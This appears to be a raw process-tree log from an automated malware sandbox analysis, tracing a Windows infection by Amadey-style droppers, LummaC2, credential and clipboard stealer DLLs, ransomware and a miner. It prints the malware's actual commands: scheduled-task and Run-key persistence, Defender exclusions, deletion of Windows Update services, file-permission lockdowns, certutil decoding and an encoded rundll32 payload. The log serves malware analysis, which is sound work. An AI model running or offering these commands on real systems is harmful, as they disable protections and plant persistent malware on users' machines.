C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\Admin\AppData\Local\Temp\9e0894bcc4\nbveek.exe" /F6⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nbveek.exe" /P "Admin:N"&&CACLS "nbveek.exe" /P "Admin:R" /E&&echo Y|CACLS "..\9e0894bcc4" /P "Admin:N"&&CACLS "..\9e0894bcc4" /P "Admin:R" /E&&Exit6⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"7⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "nbveek.exe" /P "Admin:N"7⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "nbveek.exe" /P "Admin:R" /E7⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"7⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\9e0894bcc4" /P "Admin:N"7⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\9e0894bcc4" /P "Admin:R" /E7⤵
-
C:\Users\Admin\AppData\Local\Temp\1000043001\OwvtknErB0Wl.exe"C:\Users\Admin\AppData\Local\Temp\1000043001\OwvtknErB0Wl.exe"6⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngentask.exe"7⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2332 -s 12807⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2332 -s 12887⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\1000051001\Player3.exe"C:\Users\Admin\AppData\Local\Temp\1000051001\Player3.exe"6⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe"C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe"7⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN nbveek.exe /TR "C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe" /F8⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "nbveek.exe" /P "Admin:N"&&CACLS "nbveek.exe" /P "Admin:R" /E&&echo Y|CACLS "..\16de06bfb4" /P "Admin:N"&&CACLS "..\16de06bfb4" /P "Admin:R" /E&&Exit8⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"9⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "nbveek.exe" /P "Admin:N"9⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "nbveek.exe" /P "Admin:R" /E9⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"9⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\16de06bfb4" /P "Admin:N"9⤵
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\16de06bfb4" /P "Admin:R" /E9⤵
-
C:\Users\Admin\AppData\Local\Temp\1000089001\pb1111.exe"C:\Users\Admin\AppData\Local\Temp\1000089001\pb1111.exe"8⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\1000090001\random.exe"C:\Users\Admin\AppData\Local\Temp\1000090001\random.exe"8⤵
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\Temp\1000090001\random.exe"C:\Users\Admin\AppData\Local\Temp\1000090001\random.exe" -h9⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\1000091001\XandETC.exe"C:\Users\Admin\AppData\Local\Temp\1000091001\XandETC.exe"8⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Drops file in Program Files directory
-
C:\Users\Admin\AppData\Local\Temp\1000092001\ChromeSetup.exe"C:\Users\Admin\AppData\Local\Temp\1000092001\ChromeSetup.exe"8⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\cred64.dll, Main8⤵
- Loads dropped DLL
-
C:\Windows\system32\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\07c6bc37dc5087\cred64.dll, Main9⤵
- Loads dropped DLL
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 4280 -s 68010⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\1000063001\cc.exe"C:\Users\Admin\AppData\Local\Temp\1000063001\cc.exe"6⤵
- Executes dropped EXE
-
C:\Windows\system32\rundll32.exe"C:\Users\Admin\AppData\Roaming\nsis_unse5708f9.dll",PrintUIEntry |5CQkOhmAAAA|1TKr5GsMwYD|67sDqg8OAAl|xYmwxC0TNSO|1k8B3tZkgiyf2sAZQByAG4XAP9sADMAMgAuAKVkHwBs8|AtBQPz8Gn7AHMfAEwAdQBX|wBIADEAOAB4vh8ATQBJAEEtAln|SIPsKOgEAgD|AEiDxCjDzMz|zEyJRCQYSIn|VCQQSIlMJAj+XQFIi0QkMEiJ2wQkgQE4SG8ACEhvx0QkEC0B6w6BAV8QSIPAAY8BEIEBt0BIOZYAcyWfA4v|DCRIA8hIi8HXSItMqwFUewAD0f9Ii8qKCYgI6|3BZgVlSIsEJWD+8|AzyUiLUBhI|zvRdDZIg8Ig|0iLAkg7wnQq|2aDeEgYdRpM|4tAUGZBgzhru3QHERFLdQgREHj|EC50BUiLAOuv1UiLSP0AwWoAQP9TVVZXQVRBVe9BVkFXXQFmgTn|TVpNi|hMi|K|SIvZD4X88|BM|2NJPEGBPAlQv0UAAA+F6vPwQe+LhAmI8|CFwEi|jTwBD4TWahGDd7wJjC0BD4TH8|D|RItnIESLXxz|i3ckRItPGEz|A+FMA9lIA|H|M8lFhckPhKT+8|BNi8RBixBF|zPSSAPTigKE|8B0HUHByg0Pe77A+gABRAPQvxH|dexBgfqq|A3|fHQOg8EBSYP|wARBO8lzaev|xovBD7cMTkX|iyyLTAPrdFj7M+2qEHRRQYsU|sEA0zPJigJMi9|C6w|BycgRA8je5RABQYoA1RDtM3|AM|ZBOwy24BD+pgCDxgGD+Ahy|+7rCkiLy0H|f9VJiQT3g8XkEH|EBDtvGHKvZgH|QV9BXkFdQVzvX15dWzMXSIHs+2ABZACL6ehm|v|||0iFwA+EmNZ1IEyNrwGLKxDIM|f|6Jt9II1fBEz|jUVGM9KLy||3VCRogCBMi+AP64RrdSBFqBAzwIt905EgSIl8JCCmIP1wgCBIi|APhEv8dSCmIFBIjVYIRH+NR0BIjYwkhRG|SIvY6Hz9fiCNq1ZI3iAQ4iHM8|Do|WfvIESLBo1XCPRBIKYgWMohiYQkgNqHEt7z8IsO2iBYiWOMJHERBzCRIOgx7yD7i5wtMkyLXTpI74P7bEiKIDBMib9kJDhMi6QaMky7iVyEAYQk3IcRhu2SjRGNR0swjCTwfvPwSYvU6On8BTC7ipx4MkiNhHgyQf+A8yGNT2xEMP0YpAKD6QF184H9vHgyIVJleHVN74uEJPQiMZQk+P41AcJIO9hyOIP|+mx2M0SNSUCe+gCUQbgAmACmIECeyiL4dBlEtjDAMUnvjVQkbJEgSYPod2zoa4IwSIvOpiD|eEiF|3QSi1XzQkyOMBsxSI1MJD9A|9dIgcR0IWEkAC0ILQE=7⤵
- Blocklisted process makes network request
- Loads dropped DLL
- Accesses Microsoft Outlook profiles
- Checks processor information in registry
- outlook_office_path
- outlook_win_path
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 2948 -s 2968⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 4844 -s 7087⤵
- Program crash
-
C:\Users\Admin\AppData\Local\Temp\1000090001\uplagin.exe"C:\Users\Admin\AppData\Local\Temp\1000090001\uplagin.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\SETUP_33455\Engine.exeC:\Users\Admin\AppData\Local\Temp\SETUP_33455\Engine.exe /TH_ID=_1772 /OriginExe="C:\Users\Admin\AppData\Local\Temp\1000090001\uplagin.exe"7⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\CmD.exeC:\Windows\system32\CmD.exe /c cmd < 808⤵
-
C:\Windows\SysWOW64\cmd.execmd9⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell get-process avastui10⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell get-process avgui10⤵
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\certutil.execertutil -decode 5 5fbHlM10⤵
-
C:\Windows\SysWOW64\findstr.exefindstr /V /R "^BYLhzgJfvHMGFGbkIYAzlXUMcmgLOfzNNBjXWVOwahotMobsaoVUFcQEtYSUZYBuhYTtzmgNlmwWOQZjwXaFxnosKI$" 5fbHlM10⤵
-
C:\Users\Admin\AppData\Local\Temp\q25jy1i2.aam\18931\Russian.exe.pif18931\\Russian.exe.pif 18931\\N10⤵
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\q25jy1i2.aam\18931\Russian.exe.pif" & exit11⤵
-
C:\Windows\SysWOW64\timeout.exetimeout /t 612⤵
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\PING.EXEping localhost -n 1810⤵
- Runs ping.exe
-
C:\Users\Admin\AppData\Local\Temp\1000105001\raud-290123del700_2023-01-29_12-52.exe"C:\Users\Admin\AppData\Local\Temp\1000105001\raud-290123del700_2023-01-29_12-52.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\1000105001\raud-290123del700_2023-01-29_12-52.exe"C:\Users\Admin\AppData\Local\Temp\1000105001\raud-290123del700_2023-01-29_12-52.exe"7⤵
- Executes dropped EXE
- Checks computer location settings
- Adds Run key to start application
-
C:\Windows\SysWOW64\icacls.exe (depth 8)
icacls "C:\Users\Admin\AppData\Local\a7e592f1-b46b-45d4-965a-f2891e354357" /deny *S-1-1-0:(OI)(CI)(DE,DC)
- Modifies file permissions
-
C:\Users\Admin\AppData\Local\Temp\1000105001\raud-290123del700_2023-01-29_12-52.exe (depth 8)
"C:\Users\Admin\AppData\Local\Temp\1000105001\raud-290123del700_2023-01-29_12-52.exe" --Admin IsNotAutoStart IsNotTask
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\Temp\1000105001\raud-290123del700_2023-01-29_12-52.exe (depth 9)
"C:\Users\Admin\AppData\Local\Temp\1000105001\raud-290123del700_2023-01-29_12-52.exe" --Admin IsNotAutoStart IsNotTask
- Executes dropped EXE
- Checks computer location settings
-
C:\Users\Admin\AppData\Local\ecb5167c-29c1-4559-866a-e1dcb52fad8b\build2.exe (depth 10)
"C:\Users\Admin\AppData\Local\ecb5167c-29c1-4559-866a-e1dcb52fad8b\build2.exe"
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\AppData\Local\ecb5167c-29c1-4559-866a-e1dcb52fad8b\build2.exe (depth 11)
"C:\Users\Admin\AppData\Local\ecb5167c-29c1-4559-866a-e1dcb52fad8b\build2.exe"
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exe (depth 12)
C:\Windows\SysWOW64\WerFault.exe -u -p 2220 -s 1620
- Program crash
-
C:\Users\Admin\AppData\Local\ecb5167c-29c1-4559-866a-e1dcb52fad8b\build3.exe (depth 10)
"C:\Users\Admin\AppData\Local\ecb5167c-29c1-4559-866a-e1dcb52fad8b\build3.exe"
- Executes dropped EXE
-
C:\Windows\SysWOW64\schtasks.exe (depth 11)
/C /create /F /sc minute /mo 1 /tn "Azure-Update-Task" /tr "C:\Users\Admin\AppData\Roaming\Microsoft\Network\mstsca.exe"
- Creates scheduled task(s)
-
C:\Users\Admin\AppData\Local\Temp\1000119001\jn-17L.exe (depth 6)
"C:\Users\Admin\AppData\Local\Temp\1000119001\jn-17L.exe"
- Executes dropped EXE
- Checks computer location settings
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 7)
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ep bypass -windowstyle hidden -file "C:\Users\Admin\AppData\Local\Temp\xtt8wcvtp7dg8v5p6khamra6v9xtaykn.ps1"
- Blocklisted process makes network request
- Drops startup file
- Modifies registry class
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\1000122001\LummaC2.exe (depth 6)
"C:\Users\Admin\AppData\Local\Temp\1000122001\LummaC2.exe"
- Executes dropped EXE
-
C:\Users\Admin\AppData\Local\Temp\1000125001\video.exe (depth 6)
"C:\Users\Admin\AppData\Local\Temp\1000125001\video.exe"
- Executes dropped EXE
- Checks computer location settings
- Loads dropped DLL
- Checks processor information in registry
-
C:\Windows\SysWOW64\cmd.exe (depth 7)
"C:\Windows\System32\cmd.exe" /c timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\1000125001\video.exe" & exit
-
C:\Windows\SysWOW64\timeout.exe (depth 8)
timeout /t 6
- Delays execution with timeout.exe
-
C:\Windows\SysWOW64\WerFault.exe (depth 7)
C:\Windows\SysWOW64\WerFault.exe -u -p 2376 -s 1992
- Program crash
-
C:\Windows\SysWOW64\rundll32.exe (depth 6)
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
- Loads dropped DLL
-
C:\Windows\system32\rundll32.exe (depth 7)
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\cred64.dll, Main
- Loads dropped DLL
-
C:\Windows\system32\WerFault.exe (depth 8)
C:\Windows\system32\WerFault.exe -u -p 3512 -s 684
- Program crash
-
C:\Windows\SysWOW64\rundll32.exe (depth 6)
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\1000009001\fular.exe (depth 4)
"C:\Users\Admin\AppData\Local\Temp\1000009001\fular.exe"
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\1000010001\fular1.exe (depth 4)
"C:\Users\Admin\AppData\Local\Temp\1000010001\fular1.exe"
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\WerFault.exe (depth 5)
C:\Windows\SysWOW64\WerFault.exe -u -p 432 -s 1232
- Program crash
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
-
C:\Users\Admin\AppData\Local\Temp\1000011001\vina.exe (depth 4)
"C:\Users\Admin\AppData\Local\Temp\1000011001\vina.exe"
- Executes dropped EXE
-
C:\Users\Admin\AppData\Roaming\1000012000\vina1.exe (depth 4)
"C:\Users\Admin\AppData\Roaming\1000012000\vina1.exe"
- Executes dropped EXE
- Suspicious use of NtSetInformationThreadHideFromDebugger
- Checks SCSI registry key(s)
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\SysWOW64\rundll32.exe (depth 4)
"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll, Main
- Loads dropped DLL
-
C:\Users\Admin\AppData\Local\Temp\9308.exe (depth 2)
C:\Users\Admin\AppData\Local\Temp\9308.exe
- Executes dropped EXE
-
C:\Windows\SysWOW64\rundll32.exe (depth 3)
C:\Windows\system32\rundll32.exe C:\Users\Admin\AppData\Local\Temp\Eorppuwwrieiyod.dll,start
- Blocklisted process makes network request
- Loads dropped DLL
- Suspicious use of SetThreadContext
- Checks processor information in registry
-
C:\Windows\system32\rundll32.exe (depth 4)
"C:\Windows\system32\rundll32.exe" "C:\Windows\system32\shell32.dll",#61 23771
- Modifies registry class
- Suspicious use of FindShellTrayWindow
-
C:\Windows\SysWOW64\WerFault.exe (depth 3)
C:\Windows\SysWOW64\WerFault.exe -u -p 2656 -s 548
- Program crash
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 2)
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 2)
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\cmd.exe (depth 2)
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
-
C:\Windows\System32\powercfg.exe (depth 3)
powercfg /x -hibernate-timeout-ac 0
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\powercfg.exe (depth 3)
powercfg /x -hibernate-timeout-dc 0
-
C:\Windows\System32\powercfg.exe (depth 3)
powercfg /x -standby-timeout-ac 0
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\powercfg.exe (depth 3)
powercfg /x -standby-timeout-dc 0
-
C:\Windows\System32\cmd.exe (depth 2)
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
-
C:\Windows\System32\sc.exe (depth 3)
sc stop UsoSvc
- Launches sc.exe
-
C:\Windows\System32\sc.exe (depth 3)
sc stop WaaSMedicSvc
- Launches sc.exe
-
C:\Windows\System32\sc.exe (depth 3)
sc stop wuauserv
- Launches sc.exe
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\sc.exe (depth 3)
sc stop bits
- Launches sc.exe
-
C:\Windows\System32\sc.exe (depth 3)
sc stop dosvc
- Launches sc.exe
-
C:\Windows\System32\reg.exe (depth 3)
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
-
C:\Windows\System32\reg.exe (depth 3)
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
- Suspicious use of AdjustPrivilegeToken
-
C:\Windows\System32\reg.exe (depth 3)
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
- Modifies security service
-
C:\Windows\System32\reg.exe (depth 3)
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
-
C:\Windows\System32\reg.exe (depth 3)
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 2)
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#iqegjinl#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { schtasks /run /tn "NoteUpdateTaskMachineQC" } Else { "C:\Program Files\Notepad\Chrome\updater.exe" }
-
C:\Windows\system32\schtasks.exe (depth 3)
"C:\Windows\system32\schtasks.exe" /run /tn NoteUpdateTaskMachineQC
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 2)
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramFiles) -Force
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\System32\cmd.exe (depth 2)
C:\Windows\System32\cmd.exe /c sc stop UsoSvc & sc stop WaaSMedicSvc & sc stop wuauserv & sc stop bits & sc stop dosvc & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f & reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
-
C:\Windows\System32\sc.exe (depth 3)
sc stop UsoSvc
- Launches sc.exe
-
C:\Windows\System32\sc.exe (depth 3)
sc stop WaaSMedicSvc
- Launches sc.exe
-
C:\Windows\System32\sc.exe (depth 3)
sc stop wuauserv
- Launches sc.exe
-
C:\Windows\System32\sc.exe (depth 3)
sc stop bits
- Launches sc.exe
-
C:\Windows\System32\sc.exe (depth 3)
sc stop dosvc
- Launches sc.exe
-
C:\Windows\System32\reg.exe (depth 3)
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\UsoSvc" /f
-
C:\Windows\System32\reg.exe (depth 3)
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\WaaSMedicSvc" /f
-
C:\Windows\System32\reg.exe (depth 3)
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\wuauserv" /f
-
C:\Windows\System32\reg.exe (depth 3)
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\bits" /f
-
C:\Windows\System32\reg.exe (depth 3)
reg delete "HKLM\SYSTEM\CurrentControlSet\Services\dosvc" /f
-
C:\Windows\System32\cmd.exe (depth 2)
C:\Windows\System32\cmd.exe /c powercfg /x -hibernate-timeout-ac 0 & powercfg /x -hibernate-timeout-dc 0 & powercfg /x -standby-timeout-ac 0 & powercfg /x -standby-timeout-dc 0
-
C:\Windows\System32\powercfg.exe (depth 3)
powercfg /x -hibernate-timeout-ac 0
-
C:\Windows\System32\powercfg.exe (depth 3)
powercfg /x -hibernate-timeout-dc 0
-
C:\Windows\System32\powercfg.exe (depth 3)
powercfg /x -standby-timeout-ac 0
-
C:\Windows\System32\powercfg.exe (depth 3)
powercfg /x -standby-timeout-dc 0
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe (depth 2)
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe <#wsyzqeupt#> IF((New-Object Security.Principal.WindowsPrincipal([Security.Principal.WindowsIdentity]::GetCurrent())).IsInRole([Security.Principal.WindowsBuiltInRole]::Administrator)) { IF([System.Environment]::OSVersion.Version -lt [System.Version]"6.2") { schtasks /create /f /sc onlogon /rl highest /ru 'System' /tn 'NoteUpdateTaskMachineQC' /tr '''C:\Program Files\Notepad\Chrome\updater.exe''' } Else { Register-ScheduledTask -Action (New-ScheduledTaskAction -Execute 'C:\Program Files\Notepad\Chrome\updater.exe') -Trigger (New-ScheduledTaskTrigger -AtStartup) -Settings (New-ScheduledTaskSettingsSet -AllowStartIfOnBatteries -DisallowHardTerminate -DontStopIfGoingOnBatteries -DontStopOnIdleEnd -ExecutionTimeLimit (New-TimeSpan -Days 1000)) -TaskName 'NoteUpdateTaskMachineQC' -User 'System' -RunLevel 'Highest' -Force; } } Else { reg add "HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run" /v "NoteUpdateTaskMachineQC" /t REG_SZ /f /d 'C:\Program Files\Notepad\Chrome\updater.exe' }
- Drops file in System32 directory
- Modifies data under HKEY_USERS
-
C:\Windows\System32\conhost.exe (depth 2)
C:\Windows\System32\conhost.exe zuhwtyqtfkk
- Suspicious use of NtCreateUserProcessOtherParentProcess
-
C:\Windows\System32\cmd.exe (depth 2)
C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
- Drops file in Program Files directory
-
C:\Windows\System32\Wbem\WMIC.exe (depth 3)
wmic PATH Win32_VideoController GET Name, VideoProcessor
-
C:\Windows\System32\cmd.exe (depth 2)
C:\Windows\System32\cmd.exe /c wmic PATH Win32_VideoController GET Name, VideoProcessor > "C:\Program Files\Google\Libs\g.log"
- Drops file in Program Files directory
-
C:\Windows\System32\conhost.exe (depth 2)
C:\Windows\System32\conhost.exe ozascextlcafxrlv
- Modifies data under HKEY_USERS
-
C:\Windows\system32\taskhostw.exe (depth 1)
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
-
C:\Windows\SysWOW64\fontview.exe (depth 2)
"C:\Windows\SYSWOW64\fontview.exe"
-
C:\Windows\SysWOW64\WerFault.exe (depth 1)
C:\Windows\SysWOW64\WerFault.exe -pss -s 428 -p 2332 -ip 2332
-
C:\Windows\SysWOW64\WerFault.exe (depth 1)
C:\Windows\SysWOW64\WerFault.exe -pss -s 472 -p 2332 -ip 2332
-
C:\Windows\SysWOW64\WerFault.exe (depth 1)
C:\Windows\SysWOW64\WerFault.exe -pss -s 468 -p 3200 -ip 3200
-
C:\Windows\system32\OpenWith.exe (depth 1)
C:\Windows\system32\OpenWith.exe -Embedding
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\WerFault.exe (depth 1)
C:\Windows\SysWOW64\WerFault.exe -pss -s 572 -p 4844 -ip 4844
-
C:\Windows\system32\rundll32.exe (depth 1)
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
- Process spawned unexpected child process
-
C:\Windows\SysWOW64\rundll32.exe (depth 2)
rundll32.exe "C:\Users\Admin\AppData\Local\Temp\db.dll",open
-
C:\Windows\SysWOW64\WerFault.exe (depth 3)
C:\Windows\SysWOW64\WerFault.exe -u -p 4784 -s 600
- Program crash
-
C:\Windows\SysWOW64\WerFault.exe (depth 1)
C:\Windows\SysWOW64\WerFault.exe -pss -s 520 -p 4784 -ip 4784
-
C:\Windows\SysWOW64\WerFault.exe (depth 1)
C:\Windows\SysWOW64\WerFault.exe -pss -s 588 -p 4976 -ip 4976
-
C:\Windows\system32\svchost.exe (depth 1)
C:\Windows\system32\svchost.exe -k BcastDVRUserService -s BcastDVRUserService
- Drops desktop.ini file(s)
- Checks processor information in registry
- Modifies registry class
-
C:\Windows\SysWOW64\WerFault.exe (depth 1)
C:\Windows\SysWOW64\WerFault.exe -pss -s 620 -p 432 -ip 432
-
C:\Windows\system32\svchost.exe (depth 1)
C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s PcaSvc
- Loads dropped DLL
-
C:\Windows\system32\WerFault.exe (depth 1)
C:\Windows\system32\WerFault.exe -pss -s 608 -p 2948 -ip 2948
-
C:\Windows\SysWOW64\WerFault.exe (depth 1)
C:\Windows\SysWOW64\WerFault.exe -pss -s 644 -p 2376 -ip 2376
-
C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe (depth 1)
C:\Users\Admin\AppData\Local\Temp\16de06bfb4\nbveek.exe
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exe (depth 1)
C:\Windows\SysWOW64\WerFault.exe -pss -s 560 -p 2220 -ip 2220
-
C:\Windows\system32\WerFault.exe (depth 1)
C:\Windows\system32\WerFault.exe -pss -s 628 -p 3512 -ip 3512
-
C:\Windows\system32\svchost.exe (depth 1)
C:\Windows\system32\svchost.exe -k BcastDVRUserService -s BcastDVRUserService
- Checks processor information in registry
- Modifies registry class
-
C:\Windows\system32\WerFault.exe (depth 1)
C:\Windows\system32\WerFault.exe -pss -s 604 -p 4280 -ip 4280
-
C:\Windows\SysWOW64\WerFault.exe (depth 1)
C:\Windows\SysWOW64\WerFault.exe -pss -s 384 -p 2656 -ip 2656
-
C:\Program Files\Notepad\Chrome\updater.exe (depth 1)
"C:\Program Files\Notepad\Chrome\updater.exe"
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Drops file in Program Files directory
